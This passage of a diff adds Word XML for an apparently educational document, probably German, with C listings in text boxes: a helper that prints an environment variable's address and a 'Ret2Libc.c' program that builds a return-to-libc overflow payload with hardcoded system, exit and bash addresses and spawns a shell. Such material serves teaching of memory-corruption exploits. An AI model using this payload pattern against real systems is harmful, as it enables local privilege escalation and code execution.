+                              <w:t>addr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> = </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>getenv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[1]);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>printf</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>("</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>Address</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>of</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %s </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>is</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %p\n", </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>argv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">[1], </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>addr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>printf</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">("String </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>present</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>there</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>is</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> %s\n", </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>addr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>return</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 1;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
+                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
+                        <a:prstTxWarp prst="textNoShape">
+                          <a:avLst/>
+                        </a:prstTxWarp>
+                        <a:noAutofit/>
+                      </wps:bodyPr>
+                    </wps:wsp>
+                  </a:graphicData>
+                </a:graphic>
+                <wp14:sizeRelV relativeFrom="margin">
+                  <wp14:pctHeight>0</wp14:pctHeight>
+                </wp14:sizeRelV>
+              </wp:anchor>
+            </w:drawing>
+          </mc:Choice>
+          <mc:Fallback>
+            <w:pict>
+              <v:shape id="Textfeld 22" o:spid="_x0000_s1039" type="#_x0000_t202" style="position:absolute;margin-left:17.75pt;margin-top:9.35pt;width:333.25pt;height:141.95pt;z-index:251674624;visibility:visible;mso-wrap-style:square;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-height-percent:0;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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" fillcolor="#a5a5a5 [2092]" strokeweight=".5pt">
+                <v:fill opacity="52428f"/>
+                <v:textbox>
+                  <w:txbxContent>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdio.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>#</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>include</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&lt;</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>stdlib.h</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>&gt;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>main</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>int</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argc</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">, </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> **</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>)</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>{</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>char</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> *</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>addr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> = </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>getenv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>(</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>[1]);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>printf</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>("</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>Address</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>of</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %s </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>is</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %p\n", </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>argv</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">[1], </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>addr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>printf</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve">("String </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>present</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>there</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>is</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> %s\n", </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>addr</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t>);</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t xml:space="preserve">        </w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellStart"/>
+                      <w:r>
+                        <w:t>return</w:t>
+                      </w:r>
+                      <w:proofErr w:type="spellEnd"/>
+                      <w:r>
+                        <w:t xml:space="preserve"> 1;</w:t>
+                      </w:r>
+                    </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="KeinLeerraum"/>
+                      </w:pPr>
+                      <w:r>
+                        <w:t>}</w:t>
+                      </w:r>
+                    </w:p>
+                  </w:txbxContent>
+                </v:textbox>
+              </v:shape>
+            </w:pict>
+          </mc:Fallback>
+        </mc:AlternateContent>
+      </w:r>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="berschrift3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="30" w:name="_Toc339281432"/>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>Ret2Libc.c</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="30"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="de-DE"/>
+        </w:rPr>
+        <mc:AlternateContent>
+          <mc:Choice Requires="wps">
+            <w:drawing>
+              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
+                <wp:simplePos x="0" y="0"/>
+                <wp:positionH relativeFrom="column">
+                  <wp:posOffset>225620</wp:posOffset>
+                </wp:positionH>
+                <wp:positionV relativeFrom="paragraph">
+                  <wp:posOffset>157606</wp:posOffset>
+                </wp:positionV>
+                <wp:extent cx="4229100" cy="4797299"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="22860"/>
+                <wp:wrapNone/>
+                <wp:docPr id="23" name="Textfeld 23"/>
+                <wp:cNvGraphicFramePr/>
+                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
+                    <wps:wsp>
+                      <wps:cNvSpPr txBox="1"/>
+                      <wps:spPr>
+                        <a:xfrm>
+                          <a:off x="0" y="0"/>
+                          <a:ext cx="4229100" cy="4797299"/>
+                        </a:xfrm>
+                        <a:prstGeom prst="rect">
+                          <a:avLst/>
+                        </a:prstGeom>
+                        <a:solidFill>
+                          <a:schemeClr val="bg1">
+                            <a:lumMod val="65000"/>
+                            <a:alpha val="80000"/>
+                          </a:schemeClr>
+                        </a:solidFill>
+                        <a:ln w="6350">
+                          <a:solidFill>
+                            <a:prstClr val="black"/>
+                          </a:solidFill>
+                        </a:ln>
+                        <a:effectLst/>
+                      </wps:spPr>
+                      <wps:style>
+                        <a:lnRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:lnRef>
+                        <a:fillRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:fillRef>
+                        <a:effectRef idx="0">
+                          <a:schemeClr val="accent1"/>
+                        </a:effectRef>
+                        <a:fontRef idx="minor">
+                          <a:schemeClr val="dk1"/>
+                        </a:fontRef>
+                      </wps:style>
+                      <wps:txbx>
+                        <w:txbxContent>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdio.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>stdlib.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>#</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>include</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&lt;</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>string.h</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>&gt;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>systemAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\x60\xe5\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xea</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\xb7";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>exitAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\x50\x3b\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xea</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\xb7";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bashAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[] = "\x50\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xfd</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xff</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>\</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>xbf</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>";</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>main</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>()</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>{</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>char</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>[104];</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memset</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 0x90, 104);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, "BUF=", 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">(buffer+88, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>systemAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">(buffer+92, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>exitAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve">(buffer+96, </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bashAddr</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>, 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>memcpy</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(buffer+100, "\x00\x00\x00\x00", 4);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>putenv</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>(</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>buffer</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>);</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>system</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>("/bin/</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>bash</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t>");</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t xml:space="preserve">        </w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellStart"/>
+                            <w:r>
+                              <w:t>return</w:t>
+                            </w:r>
+                            <w:proofErr w:type="spellEnd"/>
+                            <w:r>
+                              <w:t xml:space="preserve"> 1;</w:t>
+                            </w:r>
+                          </w:p>
+                          <w:p>
+                            <w:pPr>
+                              <w:pStyle w:val="KeinLeerraum"/>
+                            </w:pPr>
+                            <w:r>
+                              <w:t>}</w:t>
+                            </w:r>
+                          </w:p>
+                        </w:txbxContent>
+                      </wps:txbx>
